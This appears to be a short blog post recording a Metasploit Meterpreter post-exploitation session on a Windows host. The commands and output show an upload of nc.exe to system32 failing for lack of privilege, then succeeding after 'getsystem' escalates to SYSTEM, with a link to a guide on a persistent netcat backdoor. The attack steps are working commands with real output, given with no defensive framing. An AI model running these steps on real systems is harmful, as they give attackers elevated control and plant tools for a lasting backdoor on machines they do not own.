control – metasploit post exploit nc.exe

 

[*] Meterpreter session 2 opened (Internal-IP:4444 -> External-IP:1109) at 2010-02-01 02:12:50 +0100

Bellow shows insufficient privilege after exploit to upload netcat

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading  : /pentest/windows-binaries/tools/nc.exe -> C:\windows\system32
[-] core_channel_open: Operation failed: Access is denied.

To elevate privilege after exploit and upload netcat

meterpreter > getsystem
…got system (via technique 4).
meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading  : /pentest/windows-binaries/tools/nc.exe -> C:\windows\system32
[*] uploaded   : /pentest/windows-binaries/tools/nc.exe -> C:\windows\system32\nc.exe

 

http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor

 

2 thoughts on “control – metasploit post exploit nc.exe

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s